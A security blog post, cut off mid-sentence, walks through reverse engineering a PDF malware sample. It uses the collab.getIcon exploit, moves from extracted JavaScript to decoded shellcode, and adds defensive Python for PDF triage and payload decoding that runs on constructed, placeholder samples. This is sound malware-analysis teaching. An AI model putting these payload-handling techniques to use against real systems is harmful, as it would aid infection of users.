Mario's Security Blog - Reverse Engineering AudioDr7 PDF Malware (published 2012-04-09, updated 2012-04-10)<div>
<span style="font-size: large;">1. Introduction</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">This
article presents a step-by-step analysis of a malware sample we will call AudioDr7, after
the URL it attempts to contact. The MD5 hash of the malware is “ca1c1adab23e5baeeb3b49e0809e4ad4”
and a sample can be found at <i>offensivecomputing.com</i>.
The malware is embedded in a PDF document. Several tools aid in the analysis:
tools to extract the JavaScript, execute the payload, obtain the shellcode, and
finally run the malicious code in an emulator and a debugger. All of these are
shown later in this article.</span></div>
<div>
<br /></div>
<div>
<span style="font-size: large;">2. The Malware</span></div>
<div>
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">A sample of the m</span><span style="font-size: 15px; line-height: 17px;">alware</span><span style="font-size: 11pt; line-height: 115%;"> analyzed in this article can be obtained at </span><a href="http://www.offensivecomputing.net/" style="font-size: 11pt; line-height: 115%;" target="_blank">http://www.offensivecomputing.net/</a><span style="font-size: 11pt; line-height: 115%;">.</span></span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWqVaIdDxqZWgmJ4_guYJY8mHw_2McNE-4WjawhP3Ky8Ws6E9Z0yce1u3_DT2iU-inU1wC1Yl3Ci5NCyxLzaDt-fnmJ797I9rNgvh1BLk-KROG4jUwTkJA6TcINzWeNCi3adFmI-KlryO/s1600/Figure1-0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWqVaIdDxqZWgmJ4_guYJY8mHw_2McNE-4WjawhP3Ky8Ws6E9Z0yce1u3_DT2iU-inU1wC1Yl3Ci5NCyxLzaDt-fnmJ797I9rNgvh1BLk-KROG4jUwTkJA6TcINzWeNCi3adFmI-KlryO/s640/Figure1-0.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.0 - <i>Malware found on Offensive Computing</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
analysis is performed on a system running Ubuntu 10.04. The PDF document is examined in a text editor in order to identify any suspicious objects
contained within the file. In Figure 1.1 VIM is used to view the PDF file and
examine its contents; the object shown there is object 13. We can be
sure this is malicious code because of the extremely large content of the variable "s": a string of numbers that most likely represents some form of
shellcode.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoFQNSLfF4cOl4HyKyXTdRzZwWT7hZLjrrYm4b801Hz8wCjWXR5SB1oktMD4y6AqHdNcgZl96YDGsd_hL4wUcgwEajAcMzVo5mqPYtM6zY0U2zNQ5jq0DDOPRwkgNw4vH2gH8IYhDK04Vl/s1600/Figure1-1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoFQNSLfF4cOl4HyKyXTdRzZwWT7hZLjrrYm4b801Hz8wCjWXR5SB1oktMD4y6AqHdNcgZl96YDGsd_hL4wUcgwEajAcMzVo5mqPYtM6zY0U2zNQ5jq0DDOPRwkgNw4vH2gH8IYhDK04Vl/s640/Figure1-1.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.1 - <i>Large string from object 13 from the malicious PDF</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Also,
following the string of numbers there is JavaScript code that appears to parse
a string. Figure 1.2 shows the code segment that follows the declaration of the variable "s".
After this preliminary inspection of the PDF document, the tool Jsunpack
[1] is used to extract any JavaScript from the PDF to a separate file.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU1_xpJxrbaxOlnU3HwkOr_kNQoPeT62-KnqXBQeLu1xwn0LIeHodAo-heTQkWgNqMkI71N_gmnN9y4aIBkWlIlGifQNA0DSks5dvsBaBj-6-WZb_A7RLTF2jXuMx7roc8kRNsRHHhcBWT/s1600/Figure1-2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU1_xpJxrbaxOlnU3HwkOr_kNQoPeT62-KnqXBQeLu1xwn0LIeHodAo-heTQkWgNqMkI71N_gmnN9y4aIBkWlIlGifQNA0DSks5dvsBaBj-6-WZb_A7RLTF2jXuMx7roc8kRNsRHHhcBWT/s640/Figure1-2.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.2 -<i> JavaScript code from object 13 from the malicious PDF</i></td></tr>
</tbody></table>
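<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The manual inspection above (a JavaScript-bearing object whose string literal is far too large to be ordinary form logic) can be scripted as a first-pass triage. The following Python is an added example and not code from the original article or from Jsunpack; the PDF it scans is constructed inline and has nothing to do with the real AudioDr7 file, and the 512-character threshold is an arbitrary assumption.</span></div>

```python
import re

# Constructed sample PDF (not the AudioDr7 file): three ordinary objects and one
# object (13, as in the article) carrying a JavaScript action whose string
# literal is suspiciously long and is decoded at run time.
LONG_STRING = b"0123456789" * 60  # 600 characters of digits
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 13 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n"
    b"13 0 obj\n<< /S /JavaScript /JS (var s = \"" + LONG_STRING + b"\"; "
    b"var out = ''; for (var i = 0; i < s.length; i += 2) "
    b"{ out += String.fromCharCode(parseInt(s.substr(i, 2), 16)); } "
    b"eval(out);) >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

# "N G obj ... endobj" pairs; DOTALL so object bodies may span lines.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
JS_MARKERS = (b"/JavaScript", b"/JS")
DECODER_HINTS = (b"eval(", b"unescape(", b"String.fromCharCode")


def split_objects(pdf):
    """Yield (object number, raw body) for every uncompressed object in the file."""
    for m in OBJ_RE.finditer(pdf):
        yield int(m.group(1)), m.group(3)


def triage_object(num, body, long_string=512):
    """Score one object; return a finding for JavaScript-bearing objects, else None."""
    if not any(marker in body for marker in JS_MARKERS):
        return None
    literals = re.findall(rb'"([^"]*)"', body) + re.findall(rb"'([^']*)'", body)
    longest = max((len(s) for s in literals), default=0)
    indicators = []
    if longest >= long_string:
        indicators.append("string literal of %d chars" % longest)
    indicators += [hint.decode() for hint in DECODER_HINTS if hint in body]
    unicode_escapes = len(re.findall(rb"%u[0-9A-Fa-f]{4}", body))
    if unicode_escapes:
        indicators.append("%d %%u escapes" % unicode_escapes)
    return {"object": num, "longest_string": longest, "indicators": indicators}


def triage_pdf(pdf, long_string=512):
    """Return findings for every object that carries JavaScript, in file order."""
    findings = (triage_object(n, b, long_string) for n, b in split_objects(pdf))
    return [f for f in findings if f is not None]


if __name__ == "__main__":
    for f in triage_pdf(SAMPLE_PDF):
        print("object %d: %s" % (f["object"], "; ".join(f["indicators"])))
```

<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Two caveats a practitioner should keep in mind: the script only sees uncompressed object bodies, so streams behind a /FlateDecode filter must be inflated first (which is part of what Jsunpack does for you), and a dictionary key written with PDF hex escapes, such as /J#53 for /JS, will slip past the plain-text marker check. It is a triage aid for deciding which object to pull out, not a verdict.</span></div>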
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure
1.3 displays the end of the output from Jsunpack. JavaScript is found and it is
written to a separate file named “malware.exe.out”. The output contains the
same information displayed in Figure 1.1 and Figure 1.2. The declaration of the
variable “s” is followed by the code to parse a string.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTlW1-uAvj5G8pXbeGRCGII6LaLrWfHZ1m_cKHWMxU2utGgpM9FZA98sfUlYbl2jgHPgyw6RyUf3b2BykR04Ud-Ghyphenhyphen_tPiaEaJ7z6vhnARGAyvGhZaCkEhYjBV-gs4ILlFTwJAdz7y02mJ/s1600/Figure1-3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTlW1-uAvj5G8pXbeGRCGII6LaLrWfHZ1m_cKHWMxU2utGgpM9FZA98sfUlYbl2jgHPgyw6RyUf3b2BykR04Ud-Ghyphenhyphen_tPiaEaJ7z6vhnARGAyvGhZaCkEhYjBV-gs4ILlFTwJAdz7y02mJ/s640/Figure1-3.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.3 -<i> Output from Jsunpack executed with the malicious PDF</i></td></tr>
</tbody></table>
<div>
<span style="font-size: large;">3. Analysis of the JavaScript</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
next step in the analysis is to find a way to obtain the shellcode, if it exists
within the PDF. The next tool to use is SpiderMonkey [2] or Google’s V8 JavaScript
Engine [3]. Both are JavaScript interpreters that allow us to run JavaScript code.
We use SpiderMonkey to execute the JavaScript
contained in the file malware.exe.out. A patched version of SpiderMonkey
1.7 is also available that makes malware analysis easier: it redefines dangerous
functions and objects in order to prevent infection of the analysis system and
to simplify the analysis. The patched SpiderMonkey 1.7 is used for this
malware analysis alongside a file named pre.js that defines document objects
so that references to them do not raise a ReferenceError. The file pre.js can be found inside the Jsunpack
folder.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEUMtEudy_2jU4m80QqKLCwtDf-dd5Oxt35PmCIzNdWBEJNDkzLd2YNuw34AIHRE78iaGAH88j5GPB1Drhiqa3k4j8XjpbsqdVqk58WF68mUFAJpzNQcX3orkRuOCz8wyqHILcWBYccqbT/s1600/Figure1-4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="31" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEUMtEudy_2jU4m80QqKLCwtDf-dd5Oxt35PmCIzNdWBEJNDkzLd2YNuw34AIHRE78iaGAH88j5GPB1Drhiqa3k4j8XjpbsqdVqk58WF68mUFAJpzNQcX3orkRuOCz8wyqHILcWBYccqbT/s640/Figure1-4.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.4 -<i> Output of SpiderMonkey executed with the malicious PDF</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
command to run SpiderMonkey with pre.js and the JavaScript found in
malware.exe.out is shown in Figure 1.4. Two interesting results can be obtained
from SpiderMonkey. First, the pre.js file from Jsunpack identifies the exploit
that the malware attempts to take advantage of; in this case it is “collab.getIcon”.
The second interesting result is the set of log files created by SpiderMonkey.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ZcCDe3B9KjfA6THZgYnSl5IrZKBfgJCT7KbXt9FCndP2W97qkXotjGhL1V3kUPTA6ihl-rYT6TdoNXRG_FJbF7GNT4PASmrccuFk6KLTZ2lRwNNgzsgOupfbhXKbK77_0jni-Imh18OQ/s1600/Figure1-5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ZcCDe3B9KjfA6THZgYnSl5IrZKBfgJCT7KbXt9FCndP2W97qkXotjGhL1V3kUPTA6ihl-rYT6TdoNXRG_FJbF7GNT4PASmrccuFk6KLTZ2lRwNNgzsgOupfbhXKbK77_0jni-Imh18OQ/s400/Figure1-5.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.5 -<i> Folder containing the two log files created by SpiderMonkey</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In
Figure 1.5 the files “eval.001.log” and “eval.002.log” are the two files
created by SpiderMonkey. The first file contains the string that is built by
the parsing function in Figure 1.2.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmqWefvFx8MrfhKZqzc2TVQdQyns9hh7PB2SW2syRcR8jsl6dNuTol9gabx-3s17gbsuGAD4xvc2LhiLxoXC99HAiTKDN7r3P8xsvBLLIrfQrqSHVfy8Obm308PM1pVsH3VR-XusNdO580/s1600/Figure1-6.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmqWefvFx8MrfhKZqzc2TVQdQyns9hh7PB2SW2syRcR8jsl6dNuTol9gabx-3s17gbsuGAD4xvc2LhiLxoXC99HAiTKDN7r3P8xsvBLLIrfQrqSHVfy8Obm308PM1pVsH3VR-XusNdO580/s640/Figure1-6.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.6 - <i>Contents of eval.001.log</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second file records the result of evaluating the string from the first file, and here we obtain the payload:
the shellcode assigned to the variable “payload”. The patched SpiderMonkey
makes it easy to execute the JavaScript and obtain the shellcode. If
the process were done manually we would have to replace the eval and unescape
calls with print statements; the JavaScript would have to be modified and
executed twice to obtain the same output.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimIO9dIQlqvfiZ5gRFfm7WOnvuQRTi8DQIZb78FM5L8WUDLOi-OA4ATYfHMm2N-BJadfBr1gAj_btGmC6gkav4-YzgnzaOUQy8o3AaYHEP84vVJh-n5fY6k1Xk3QylxYQFGySiS1p-xUvD/s1600/Figure1-7.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimIO9dIQlqvfiZ5gRFfm7WOnvuQRTi8DQIZb78FM5L8WUDLOi-OA4ATYfHMm2N-BJadfBr1gAj_btGmC6gkav4-YzgnzaOUQy8o3AaYHEP84vVJh-n5fY6k1Xk3QylxYQFGySiS1p-xUvD/s640/Figure1-7.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.7 -<i> Snippet from the contents of eval.002.log</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure
1.7 shows a snippet of the contents of eval.002.log. The payload, starting with
“%uC033” and ending with “%u0070”, is copied and saved in a separate file, “payload.txt”.
In order to analyze the shellcode we need to convert it to a hex representation, and
for this we use a Perl script provided by “Malware Analyst’s Cookbook and DVD”
[4].</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguytup3gSw5RIKQEGMYdtAbtZtfXQDKwWJhJasd3bgHrWmaGe8UXdyOgokR38eHmyvhQM4gqLjpJaKldX8NSfz7doR7L0pSYN5ycfPz-pjrM4kg8PvFqjP30057LihEFSHbx9EnRctysEy/s1600/Figure1-9.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguytup3gSw5RIKQEGMYdtAbtZtfXQDKwWJhJasd3bgHrWmaGe8UXdyOgokR38eHmyvhQM4gqLjpJaKldX8NSfz7doR7L0pSYN5ycfPz-pjrM4kg8PvFqjP30057LihEFSHbx9EnRctysEy/s640/Figure1-9.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.8 -<i> Payload converted to shellcode with Perl Script</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure
1.8 shows the hex and ASCII representation of the shellcode we converted from
the payload string. The ASCII column reveals a URL, http://audiodr7..., which
is most likely the address the malware will contact to download
more malicious code. The shellcode is saved in a separate file, labeled in
this example “shellcode.txt”. Figure 1.9 shows the command to save the output
to a separate file.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggW-osZAm_znkyg7LgLIRwo-8-rGhfmYIeG9F2TJMKAxyt6l4CgY-z25MMthjD1rUTQjv0-BQd5bqJhfQbnwSIggyaErkJ3_C71xgrjRbw8hhRD9pTRKc8s2F25RJBhXZjowCGodFQY84G/s1600/Figure1-10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="22" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggW-osZAm_znkyg7LgLIRwo-8-rGhfmYIeG9F2TJMKAxyt6l4CgY-z25MMthjD1rUTQjv0-BQd5bqJhfQbnwSIggyaErkJ3_C71xgrjRbw8hhRD9pTRKc8s2F25RJBhXZjowCGodFQY84G/s640/Figure1-10.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.9 - <i>Shellcode saved to text file named "shellcode.txt"</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-size: large;">4. Analysis of Shellcode</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
next step is to use a tool called libemu [5] that runs shellcode in an
emulated environment. libemu should report any Windows API functions that
are called and show the instructions that were executed.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGsEa7VaKF4o4x71DT3Xh3FrMoWbjNumegnNWxuTsmQj5qBw7MjVTuSBTTG5nwvnSuJVAXOFbmyOvQhuChaneSC-avElKwD5RWAvjrCu6pHHhOQ8jWRwB1gRpvLRtgBoVIJRgA4ToJ0a2b/s1600/Figure1-11.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGsEa7VaKF4o4x71DT3Xh3FrMoWbjNumegnNWxuTsmQj5qBw7MjVTuSBTTG5nwvnSuJVAXOFbmyOvQhuChaneSC-avElKwD5RWAvjrCu6pHHhOQ8jWRwB1gRpvLRtgBoVIJRgA4ToJ0a2b/s640/Figure1-11.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.10 - <i>Output of libemu executed with shellcode</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In
Figure 1.10 the step size is 100000 and the verbose option is enabled. libemu
reports that the Windows function GetTempPathA is called by the malware, and
execution stops there. Execution stops because
GetTempPathA is expected to return a temporary path for the program to use, and
the emulator provides none, so the program cannot continue. This is one limitation of libemu.
However, we can perform a manual analysis of the binary instructions of the
malware with a user-level debugger, Immunity Debugger [6].</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
hex code is needed to load the malware into Immunity Debugger. Figure 1.8 displays the hex code, and this code is copied to a separate file labeled “hexdump.txt”. To obtain the hex
code without the offset or ASCII columns, the command in Figure 1.11 is used.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH2hUuQk2ENEmpohvhZGSB3nJoNNW9lcTsZqxRM03_2v_ncG96X28PKssZ9C5pcozj8lGADHG-yNT_Cr_QN18QcPV2rUNmR4ZX_ki8qd-lXMvXL4FEiFAsNLJXFLGm8us30aiYR2vIYRme/s1600/Figure1-12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH2hUuQk2ENEmpohvhZGSB3nJoNNW9lcTsZqxRM03_2v_ncG96X28PKssZ9C5pcozj8lGADHG-yNT_Cr_QN18QcPV2rUNmR4ZX_ki8qd-lXMvXL4FEiFAsNLJXFLGm8us30aiYR2vIYRme/s640/Figure1-12.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.11 - <i>Hex dump only of the malicious shellcode</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Instead
of displaying it on the screen we save it to the file hexdump.txt as shown in
Figure 1.12.</span></div>
<div>
<br /></div>
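<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The three file-conversion steps above (turning the %uXXXX payload into bytes, viewing it as a hex-plus-ASCII dump to spot the URL, and emitting bare hex for hexdump.txt) are one small pipeline. The Python below is an added example that does the same job as the cookbook's Perl script and the hexdump commands; it is not the article's or the book's code. The payload it decodes is constructed here and is not the real AudioDr7 payload, and the URL in it is a placeholder.</span></div>

```python
import re

ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def unescape_payload(text):
    """Decode a JavaScript-escaped payload (%uXXXX and %XX) into raw bytes.

    %uXXXX is a UTF-16 code unit that unescape() places in memory little-endian,
    so "%uC033" becomes the two bytes 33 C0 (xor eax, eax). Whitespace is
    ignored so a payload.txt wrapped over several lines decodes as well."""
    text = "".join(text.split())
    out = bytearray()
    pos = 0
    for m in ESCAPE_RE.finditer(text):
        if m.start() != pos:
            raise ValueError("not an escape sequence at offset %d: %r" % (pos, text[pos:m.start()]))
        if m.group(1) is not None:
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    if pos != len(text):
        raise ValueError("trailing data at offset %d: %r" % (pos, text[pos:]))
    return bytes(out)


def to_unicode_escapes(data):
    """Inverse of unescape_payload; used here only to build the constructed sample."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("%%u%04X" % int.from_bytes(data[i:i + 2], "little")
                   for i in range(0, len(data), 2))


def hexdump(data, width=16):
    """xxd-style dump (offset, hex bytes, printable ASCII), as in Figure 1.8."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hex_part = " ".join("%02x" % b for b in chunk).ljust(width * 3 - 1)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append("%08x  %s  %s" % (off, hex_part, ascii_part))
    return "\n".join(lines)


def hex_only(data):
    """Bare hex with no offsets or ASCII column, the hexdump.txt format."""
    return data.hex()


def printable_strings(data, minimum=6):
    """Printable ASCII runs of at least `minimum` bytes (how the URL stood out)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minimum, data)]


# Constructed payload (not the real AudioDr7 payload): the article's first and
# last words, then a placeholder URL so the string search has something to find.
SAMPLE_PAYLOAD = "%uC033%u0070" + to_unicode_escapes(b"http://example.invalid/e.exe\x00")

if __name__ == "__main__":
    shellcode = unescape_payload(SAMPLE_PAYLOAD)
    print(hexdump(shellcode))
    print(hex_only(shellcode))
    print(printable_strings(shellcode))
```

<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The decoder refuses anything that is not an escape sequence rather than silently skipping it; a copy-and-paste error in payload.txt (a stray quote or a truncated %u) otherwise shifts every following byte and produces a dump that disassembles into nonsense. The byte order is the point to remember: %uC033 is the word 0xC033, which lands in memory as 33 C0.</span></div>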
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq4GC3JaDcUCfQiqjX0zCBvbNL2BnEN9gVdsAp0mf-fhwnjq_YKWqgcQ90X5nqvLL-rhH9h4rw_j4zNdJsc5VsjSUU4mwpmdx28otZUkAmIzLHG32bzS04HTgVFX-_SryuIudIFdl5sFl2/s1600/Figure1-13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="22" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq4GC3JaDcUCfQiqjX0zCBvbNL2BnEN9gVdsAp0mf-fhwnjq_YKWqgcQ90X5nqvLL-rhH9h4rw_j4zNdJsc5VsjSUU4mwpmdx28otZUkAmIzLHG32bzS04HTgVFX-_SryuIudIFdl5sFl2/s640/Figure1-13.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.12 - <i>Command to output shellcode to text file in hex code format</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Immunity
debugger is installed on a system running Windows XP SP2. From the hex dump
file we can easily obtain the executable file by using the online Sandsprite
tool “shellcode 2 exe” [7]. The hex dump is pasted into the textbox provided by
the webpage and the executable is created and downloaded to the system.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3VHr-Y-MyFWnrAGYKNwiSxTm3UtaM8NeCflwDIF47MGH79bRFFOsdcCVWOQKBY-76CLbKnjSYwJgdPbKqldwFhf8oqmdBGVe_oi990q_r95OblDRjV15zlOLtWOgk6J2EZRxPf2rv0SZX/s1600/Figure1-14.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3VHr-Y-MyFWnrAGYKNwiSxTm3UtaM8NeCflwDIF47MGH79bRFFOsdcCVWOQKBY-76CLbKnjSYwJgdPbKqldwFhf8oqmdBGVe_oi990q_r95OblDRjV15zlOLtWOgk6J2EZRxPf2rv0SZX/s400/Figure1-14.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.13 - <i>Shellcode 2 exe web interface</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
file created is labeled “shellcode.exe_”. This file can be opened with Immunity
Debugger.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQZnLKO8H3bCEp9bYHFlMNcj7IZfZfbNODCVJnR9Ofl6hZF6MWGqR6tPicQEIj30TrN7vYzc5eNt_l8uEiAbvQPAs-IVHNpID5npT8VKlekkqwOtp9ZNnVfVV6YRqF-xBM4HRjORKVIiM/s1600/Figure1-15.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQZnLKO8H3bCEp9bYHFlMNcj7IZfZfbNODCVJnR9Ofl6hZF6MWGqR6tPicQEIj30TrN7vYzc5eNt_l8uEiAbvQPAs-IVHNpID5npT8VKlekkqwOtp9ZNnVfVV6YRqF-xBM4HRjORKVIiM/s640/Figure1-15.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.14 -<i> Shellcode executable loaded into Immunity Debugger</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To
step through the program the key “F8” is used. To step into a function the key “F7”
